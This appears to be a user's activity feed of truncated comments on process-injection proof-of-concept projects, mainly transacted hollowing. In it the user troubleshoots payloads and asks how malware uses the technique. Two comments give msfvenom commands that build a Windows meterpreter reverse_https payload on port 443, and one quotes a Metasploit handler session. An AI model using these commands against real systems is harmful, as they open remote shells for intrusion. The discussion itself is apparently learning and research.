hawaii67
hawaii67
Same error here.........0.9.22.dev-binaries
The payload ist just doing nothing. I tried to debug of course but I cannot attach to the newly generated process. Error message by X64dbg: _Debugging finished! Could not get...
Well, I just used a simple ` msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 -f exe` to generate the payload. PS: Trying with a GUI program as payload like winobj64.exe, it works...
Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some...
Thanks a lot, transacted_hollowing works like a charm! Awesome work !
Thanks for your quick answer hasherezade. Sure it is a POC. I am just interested how malware is working with it. When in the real-life scenario the payload will not...
Hey thank you for this awesome explanation. Very good insight you gave. My point is, for example for transacted hollowing, the malicious file must be on the HD in order...
Ah thank you again! Now I see. FIRST a not malicious file is transacted and THEN the malicious code is written to the transacted file. That was my understanding problem....
I still get the same error.
I tried this: ` msfvenom -p windows/x64/meterpreter/reverse_https LHOST=xxxxxx LPORT=443 -f c EXITFUNC=thread` The stager connects to msf but then dies since the stage is not downloaded: ``` msf6 exploit(multi/handler) >...